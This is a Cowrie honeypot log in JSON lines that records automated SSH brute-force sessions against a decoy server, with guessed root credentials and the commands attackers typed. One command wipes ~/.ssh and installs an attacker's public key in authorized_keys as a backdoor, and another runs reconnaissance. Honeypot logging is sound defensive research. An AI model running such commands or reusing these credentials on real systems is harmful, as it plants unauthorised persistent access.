{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:02:51.581081Z","src_ip":"212.227.235.229","session":"9a1e0cf059b9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:02:52.521425Z","src_ip":"212.227.235.229","session":"9a1e0cf059b9"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:02:52.736360Z","src_ip":"212.227.235.229","session":"44ee44591f7a"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:02:52.749119Z","src_ip":"212.227.235.229","session":"9a1e0cf059b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34954,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ba0c1faaf0f","protocol":"ssh","message":"New connection: 212.227.235.229:34954 (1.2.3.4:22) [session: 6ba0c1faaf0f]","sensor":"my-vps","timestamp":"2025-08-28T16:03:01.626113Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:03:01.627351Z","src_ip":"212.227.235.229","session":"6ba0c1faaf0f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:03:01.846633Z","src_ip":"212.227.235.229","session":"6ba0c1faaf0f"}
{"eventid":"cowrie.login.success","username":"root","password":"pa$$word","message":"login attempt [root/pa$$word] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:03:02.742464Z","src_ip":"212.227.235.229","session":"6ba0c1faaf0f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:03:03.192812Z","src_ip":"212.227.235.229","session":"6ba0c1faaf0f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:03:03.193557Z","src_ip":"212.227.235.229","session":"6ba0c1faaf0f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:03:03.194837Z","src_ip":"212.227.235.229","session":"6ba0c1faaf0f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:03:03.410069Z","src_ip":"212.227.235.229","session":"6ba0c1faaf0f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:03:03.896453Z","src_ip":"212.227.235.229","session":"6ba0c1faaf0f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T16:03:03.897224Z","src_ip":"212.227.235.229","session":"6ba0c1faaf0f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T16:03:04.112993Z","src_ip":"212.227.235.229","session":"6ba0c1faaf0f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:03:04.113933Z","src_ip":"212.227.235.229","session":"6ba0c1faaf0f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34962,"dst_ip":"1.2.3.4","dst_port":22,"session":"c20ee4718ae4","protocol":"ssh","message":"New connection: 212.227.235.229:34962 (1.2.3.4:22) [session: c20ee4718ae4]","sensor":"my-vps","timestamp":"2025-08-28T16:03:04.319014Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:03:04.319690Z","src_ip":"212.227.235.229","session":"c20ee4718ae4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:03:04.526013Z","src_ip":"212.227.235.229","session":"c20ee4718ae4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T16:03:05.391831Z","src_ip":"212.227.235.229","session":"c20ee4718ae4"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:03:06.601682Z","src_ip":"212.227.235.229","session":"c20ee4718ae4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56286,"dst_ip":"1.2.3.4","dst_port":22,"session":"d109fcaddb99","protocol":"ssh","message":"New connection: 212.227.235.229:56286 (1.2.3.4:22) [session: d109fcaddb99]","sensor":"my-vps","timestamp":"2025-08-28T16:03:06.834764Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:03:06.835672Z","src_ip":"212.227.235.229","session":"d109fcaddb99"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:03:07.059891Z","src_ip":"212.227.235.229","session":"d109fcaddb99"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:03:08.000645Z","src_ip":"212.227.235.229","session":"d109fcaddb99"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:03:08.216442Z","src_ip":"212.227.235.229","session":"6ba0c1faaf0f"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:03:08.226195Z","src_ip":"212.227.235.229","session":"d109fcaddb99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42282,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c36e00f6d90","protocol":"ssh","message":"New connection: 212.227.235.229:42282 (1.2.3.4:22) [session: 8c36e00f6d90]","sensor":"my-vps","timestamp":"2025-08-28T16:03:17.512980Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:03:17.513688Z","src_ip":"212.227.235.229","session":"8c36e00f6d90"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:03:17.818542Z","src_ip":"212.227.235.229","session":"8c36e00f6d90"}
{"eventid":"cowrie.login.failed","username":"pamela","password":"pamela","message":"login attempt [pamela/pamela] failed","sensor":"my-vps","timestamp":"2025-08-28T16:03:19.076103Z","src_ip":"212.227.235.229","session":"8c36e00f6d90"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:03:20.383053Z","src_ip":"212.227.235.229","session":"8c36e00f6d90"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":37019,"dst_ip":"1.2.3.4","dst_port":22,"session":"62081be01512","protocol":"ssh","message":"New connection: 186.225.142.90:37019 (1.2.3.4:22) [session: 62081be01512]","sensor":"my-vps","timestamp":"2025-08-28T16:03:29.935063Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:03:29.936046Z","src_ip":"186.225.142.90","session":"62081be01512"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T16:03:30.225502Z","src_ip":"186.225.142.90","session":"62081be01512"}
{"eventid":"cowrie.login.success","username":"root","password":"101010","message":"login attempt [root/101010] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:03:30.963576Z","src_ip":"186.225.142.90","session":"62081be01512"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:03:31.376463Z","src_ip":"186.225.142.90","session":"62081be01512"}
{"eventid":"cowrie.command.input","input":"netstat -tulpn | head -10","message":"CMD: netstat -tulpn | head -10","sensor":"my-vps","timestamp":"2025-08-28T16:03:31.377160Z","src_ip":"186.225.142.90","session":"62081be01512"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","size":28,"shasum":"f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:03:31.569084Z","src_ip":"186.225.142.90","session":"62081be01512"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:03:31.579005Z","src_ip":"186.225.142.90","session":"62081be01512"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50538,"dst_ip":"1.2.3.4","dst_port":22,"session":"494839916d63","protocol":"ssh","message":"New connection: 212.227.235.229:50538 (1.2.3.4:22) [session: 494839916d63]","sensor":"my-vps","timestamp":"2025-08-28T16:03:32.280985Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:03:32.289160Z","src_ip":"212.227.235.229","session":"494839916d63"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T16:03:32.391493Z","src_ip":"212.227.235.229","session":"494839916d63"}
{"eventid":"cowrie.login.failed","username":"admin","password":"opnsense","message":"login attempt [admin/opnsense] failed","sensor":"my-vps","timestamp":"2025-08-28T16:03:32.754616Z","src_ip":"212.227.235.229","session":"494839916d63"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:03:34.008202Z","src_ip":"212.227.235.229","session":"494839916d63"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37504,"dst_ip":"1.2.3.4","dst_port":23,"session":"4479b928c0bf","protocol":"telnet","message":"New connection: 212.227.235.229:37504 (1.2.3.4:23) [session: 4479b928c0bf]","sensor":"my-vps","timestamp":"2025-08-28T16:03:52.089129Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58288,"dst_ip":"1.2.3.4","dst_port":22,"session":"2fa845331372","protocol":"ssh","message":"New connection: 212.227.235.229:58288 (1.2.3.4:22) [session: 2fa845331372]","sensor":"my-vps","timestamp":"2025-08-28T16:03:57.923775Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:03:57.924708Z","src_ip":"212.227.235.229","session":"2fa845331372"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:03:58.148511Z","src_ip":"212.227.235.229","session":"2fa845331372"}
{"eventid":"cowrie.login.failed","username":"guest","password":"12345678","message":"login attempt [guest/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T16:03:59.084869Z","src_ip":"212.227.235.229","session":"2fa845331372"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:04:00.311748Z","src_ip":"212.227.235.229","session":"2fa845331372"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41170,"dst_ip":"1.2.3.4","dst_port":22,"session":"ebefefc33457","protocol":"ssh","message":"New connection: 212.227.235.229:41170 (1.2.3.4:22) [session: ebefefc33457]","sensor":"my-vps","timestamp":"2025-08-28T16:04:16.829716Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:04:16.830899Z","src_ip":"212.227.235.229","session":"ebefefc33457"}
